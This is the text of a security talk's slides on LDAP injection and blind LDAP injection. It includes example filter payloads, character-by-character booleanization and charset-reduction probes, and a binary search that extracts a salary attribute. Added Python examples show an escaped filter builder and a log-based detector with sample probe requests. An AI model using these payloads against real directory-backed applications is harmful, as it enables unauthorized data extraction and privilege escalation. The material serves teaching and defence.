LDAP Injection & Blind LDAP Injection: Testing WebApps in an OpenLDAP & ADAM environment. Chema Alonso – [email_address] – Microsoft MVP Corporate Security – Security Consultant, Informática64 – http://www.informatica64.com
Login Process in a Webapp
Elevation of Privileges in an unsecure WebApp
Accessing data in an unsecure WebApp
Example: (&(objectClass=printer)(type=HP LaserJet 2100))

Injection to obtain the TRUE result:
(&(objectClass=printer)(type=HP LaserJet 2100)(objectClass=*))

Injections to obtain the objectClass values:
(&(objectClass=printer)(type=HP LaserJet 2100)(objectClass=logins))
(&(objectClass=printer)(type=HP LaserJet 2100)(objectClass=docs))
(&(objectClass=printer)(type=HP LaserJet 2100)(objectClass=news))
(&(objectClass=printer)(type=HP LaserJet 2100)(objectClass=adms))
(&(objectClass=printer)(type=HP LaserJet 2100)(objectClass=users))
…
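The injection above works because the printer type is concatenated straight into the filter string, so a value that contains ")(" closes the (type=…) item and opens a new one. The following is an added example, not code from the slides or from Informática64: it builds the slide's filter the vulnerable way and the hardened way (escaping the value as RFC 4515 requires, so "(", ")", "*", "\" and NUL become \XX hex escapes), and then counts how many filter items the resulting string really contains. The function names and the small item recogniser are this example's own; the recogniser handles only simple filters like the ones on the slides, not the full LDAP filter grammar.

```python
# Added example (not from the original slides): vulnerable vs. hardened
# construction of the "(&(objectClass=printer)(type=...))" filter, plus a
# small check that counts the filter items an input actually produced.
import re


def escape_filter_value(value: str) -> str:
    """Escape a value for use inside an LDAP search filter (RFC 4515).

    Each special character is replaced by a backslash and its two-digit hex
    code, so user input can never close or open a filter item.
    """
    out = []
    for ch in value:
        if ch in ('\\', '*', '(', ')', '\x00'):
            out.append('\\%02x' % ord(ch))
        else:
            out.append(ch)
    return ''.join(out)


def build_filter_unsafe(printer_type: str) -> str:
    # Vulnerable: the untrusted value is concatenated verbatim, which is the
    # pattern the slides exploit with a ")(objectClass=*" payload.
    return "(&(objectClass=printer)(type=%s))" % printer_type


def build_filter_safe(printer_type: str) -> str:
    # Hardened: the value is escaped first, so metacharacters are literals.
    return "(&(objectClass=printer)(type=%s))" % escape_filter_value(printer_type)


# Recognises "(attr=value)", "(attr>=value)", "(attr<=value)", "(attr~=value)"
# items whose value contains no parentheses. Deliberately minimal: it is only
# meant to show whether an input added items to a simple filter.
_ITEM = re.compile(r'\(([A-Za-z][A-Za-z0-9.;-]*)(?:[~<>]?=)([^()]*)\)')


def filter_items(ldap_filter: str) -> list:
    """Return the (attribute, value) pairs found in a simple filter string."""
    return _ITEM.findall(ldap_filter)


def items_added_by(printer_type: str, builder) -> int:
    """How many filter items beyond the two in the template did the input add?"""
    return len(filter_items(builder(printer_type))) - 2


if __name__ == "__main__":
    payload = "HP LaserJet 2100)(objectClass=*"   # payload from the slides
    for label, builder in (("unsafe", build_filter_unsafe), ("safe", build_filter_safe)):
        built = builder(payload)
        print("%-6s %s" % (label, built))
        print("       items: %s" % filter_items(built))
```

With the vulnerable builder the payload turns two filter items into three; with the escaped builder the server receives a single (type=…) item whose value happens to contain the text "\29\28objectClass=\2a", which matches no printer and leaks nothing. Most LDAP client libraries ship an equivalent escaping function; the point of writing it out is to see exactly which characters must never reach the filter unescaped.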
 
Discovering attributes in an unsecure WebApp: the attribute does NOT exist (or there is no access privilege)
Discovering attributes in an unsecure WebApp: the attribute exists (and there is access privilege)
Binary search on a numeric attribute (salary of uid=jparada):
Low index: 1 – High index: 10 – Middle value: 5
(&(objectClass=*)(uid=jparada)(salary>=5)) -> FALSE
Low index: 1 – High index: 5 – Middle value: 2
(&(objectClass=*)(uid=jparada)(salary>=2)) -> TRUE
Low index: 2 – High index: 5 – Middle value: 3
(&(objectClass=*)(uid=jparada)(salary>=3)) -> TRUE
Low index: 3 – High index: 5 – Middle value: 4
(&(objectClass=*)(uid=jparada)(salary>=4)) -> FALSE
Low index: 4 – High index: 4 – Middle value: 4
Salary = 4 [million € per month]
Injections to obtain department values using data booleanization:
(&(objectClass=printer)(type=HP LaserJet 2100)(department=*)) -> TRUE
(&(objectClass=printer)(type=HP LaserJet 2100)(department=a*)) -> FALSE
(&(objectClass=printer)(type=HP LaserJet 2100)(department=b*)) -> FALSE
(&(objectClass=printer)(type=HP LaserJet 2100)(department=c*)) -> FALSE
(&(objectClass=printer)(type=HP LaserJet 2100)(department=d*)) -> FALSE
(&(objectClass=printer)(type=HP LaserJet 2100)(department=e*)) -> FALSE
(&(objectClass=printer)(type=HP LaserJet 2100)(department=f*)) -> TRUE
(&(objectClass=printer)(type=HP LaserJet 2100)(department=fa*)) -> FALSE
(&(objectClass=printer)(type=HP LaserJet 2100)(department=fb*)) -> FALSE
…
(&(objectClass=printer)(type=HP LaserJet 2100)(department=fi*)) -> TRUE
 
Data Booleanization in an unsecure WebApp (screenshots of the False / True / False / True responses)
Injections to obtain the charset used to store data in an attribute:
(&(objectClass=printer)(type=HP LaserJet 2100)(department=*a*)) -> TRUE
(&(objectClass=printer)(type=HP LaserJet 2100)(department=*b*)) -> FALSE
(&(objectClass=printer)(type=HP LaserJet 2100)(department=*c*)) -> TRUE
(&(objectClass=printer)(type=HP LaserJet 2100)(department=*d*)) -> FALSE
(&(objectClass=printer)(type=HP LaserJet 2100)(department=*e*)) -> FALSE
(&(objectClass=printer)(type=HP LaserJet 2100)(department=*f*)) -> TRUE
(&(objectClass=printer)(type=HP LaserJet 2100)(department=*g*)) -> FALSE
(&(objectClass=printer)(type=HP LaserJet 2100)(department=*h*)) -> FALSE
(&(objectClass=printer)(type=HP LaserJet 2100)(department=*i*)) -> TRUE
…
(&(objectClass=printer)(type=HP LaserJet 2100)(department=*z*)) -> TRUE
 
Charset Reduction in an unsecure WebApp (screenshots of the False / True responses)
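Every probe in the booleanization, binary-search and charset-reduction sequences above arrives at the web application as an ordinary request parameter whose decoded value contains ")(" (closing one filter item and opening another). That is something a defender can look for in the web server's logs. The following is an added example, not part of the slides: it parses constructed Apache-style access log lines carrying the slides' own payloads (URL-encoded as a browser would send them), decodes each query parameter and flags values that contain filter-structure characters which no legitimate search term needs. The log lines, the paths /printers and /profile and the parameter names are constructed for the example.

```python
# Added example (not from the original slides): flag web requests whose
# query parameters look like LDAP filter injection probes. All log lines
# below are constructed; the payloads are the ones shown on the slides.
import re
from urllib.parse import urlsplit, parse_qsl

SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:12:00:01 +0000] "GET /printers?type=HP%20LaserJet%202100 HTTP/1.1" 200 512
10.0.0.5 - - [10/Oct/2023:12:00:02 +0000] "GET /printers?type=HP* HTTP/1.1" 200 498
10.0.0.9 - - [10/Oct/2023:12:00:03 +0000] "GET /printers?type=HP%20LaserJet%202100%29%28objectClass%3D%2A HTTP/1.1" 200 512
10.0.0.9 - - [10/Oct/2023:12:00:04 +0000] "GET /printers?type=HP%20LaserJet%202100%29%28department%3Df%2A HTTP/1.1" 200 512
10.0.0.9 - - [10/Oct/2023:12:00:05 +0000] "GET /profile?uid=jparada%29%28salary%3E%3D5 HTTP/1.1" 200 17
"""

# Common/combined log format: client, identity, user, [timestamp], "request", status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Character sequences that change filter structure. A lone "*" is not listed:
# a wildcard search such as "HP*" can be a legitimate input, and flagging it
# would only generate noise.
MARKERS = [
    (re.compile(r'\)\s*\('), 'closes a filter item and opens another'),
    (re.compile(r'\(\s*[&|!]'), 'opens a compound (&, |, !) filter'),
]


def suspicious_params(log_text: str) -> list:
    """Return one finding per flagged parameter: (ip, path, param, value, reason)."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        parts = urlsplit(m.group('target'))
        # parse_qsl percent-decodes, so %29%28 is inspected as ")(".
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            for pattern, reason in MARKERS:
                if pattern.search(value):
                    findings.append((m.group('ip'), parts.path, name, value, reason))
                    break
    return findings


def ips_by_hits(findings: list) -> list:
    """Count findings per client, most active first; blind injection needs
    many requests, so one source with a run of hits is the typical signal."""
    counts = {}
    for ip, *_ in findings:
        counts[ip] = counts.get(ip, 0) + 1
    return sorted(counts.items(), key=lambda kv: -kv[1])


if __name__ == "__main__":
    hits = suspicious_params(SAMPLE_LOG)
    for ip, path, name, value, reason in hits:
        print("%s %s %s=%r : %s" % (ip, path, name, value, reason))
    print("per client:", ips_by_hits(hits))
```

The two benign lines (a normal printer type and a wildcard search) produce no finding; the three probe lines are each flagged once and all trace back to the same client, which is the shape a blind injection leaves behind: many requests from one source, each differing by one character of the injected filter. Matching on the decoded value matters, since the same payload can be sent raw, percent-encoded or double-encoded.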